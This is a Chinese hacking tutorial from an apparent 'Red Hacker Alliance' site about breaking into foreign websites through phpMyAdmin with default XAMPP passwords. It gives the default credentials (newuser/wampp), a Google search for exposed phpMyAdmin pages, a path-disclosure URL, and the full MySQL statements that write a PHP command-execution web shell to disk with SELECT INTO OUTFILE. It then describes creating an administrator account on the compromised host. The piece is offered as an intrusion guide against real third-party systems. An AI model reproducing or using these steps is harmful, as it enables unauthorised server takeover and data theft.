利用phpmyadmin弱口令入侵国外站-红色黑客联盟

站点相关

没有相关文章


	您现在的位置：红色黑客联盟 >> 教程 >> 黑客技术 >> 脚本攻防 >> 正文

利用phpmyadmin弱口令入侵国外站

文章录入：7747.Net 责任编辑：7747.Net

【字体：小大】

作者:小波地址:www.byxiaobo.com.cn
我们已知xampp下有mysql phpmyadmin ftp 等都是功能强大程序
我们何不去利用呢？而且很多国外管理员都很懒很少改密码！因此给了我们入侵的机会！
呵呵！列如xampp的默认密码,帐号newuser 密码:wampp
我们可以常识ftp登陆dos下传1.php文件来完成我们的入侵！
不过今天我们讲的是phpmyadmin 不离题额！下次讲xampp的ftp默认帐号密码情况入侵
我也搞了动画出来了，下载地址:http://www.focusingchina.net/down/donghua/ftp.rar
打开google 搜索:phpmyadmin/index.php 大家可以更改其他关键词

呵呵，我就随便拿个phpmyadmin来演示吧！你们可以自己试搜索更多的关键词
我想很多都是国外的而且可以直接访问数据库的！如图

当然看到这个页面我们就想到导出SHELL 需要得到系统路径怎么办呢？
其实很简单暴出phpmyadmin的绝对路径
漏洞地址:phpmyadmin/themes/darkblue_orange/layout.inc.php 如图

呵呵，得到了路径当然是去建表导SHELL了，呵呵

MySQL命令建设小波并保存到本地路径X
Create TABLE `xiaobo` (`xiaobo` TEXT NOT NULL) TYPE = MYISAM; Insert INTO `xiaobo` ( `xiaobo` ) VALUES ('<?php $cmd = $_GET["cmd"];system($cmd);?>');
Select `xiaobo` FROM `xiaobo` INTO OUTFILE '这里写系统路径'; Drop TABLE `xiaobo`;
然后把xiaobo 改成你们喜欢用的表吧！然后选择数据库在点SQL备分，如图

成功了，打开webshell 执行命令如图

呵呵成功建立了帐户，基于root给予我们狠强大的权限！
在提醒新手朋友们！一般国外的的系统都会把Administrators管理组换成别的我们可以用命令来查
管理员的管理组!呵呵，罗嗦一下别骂我吖！by小波欢迎大家常来我blog吹吹牛俺会经常更新一些基础
教程给大家学习的

您对本文章有什么意见或着疑问吗？请到论坛讨论您的关注和建议是我们前行的参考和动力

上一篇文章： DB权限暴出网站物理路径代码

下一篇文章：对国内著名金融站点的一次安全检测

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】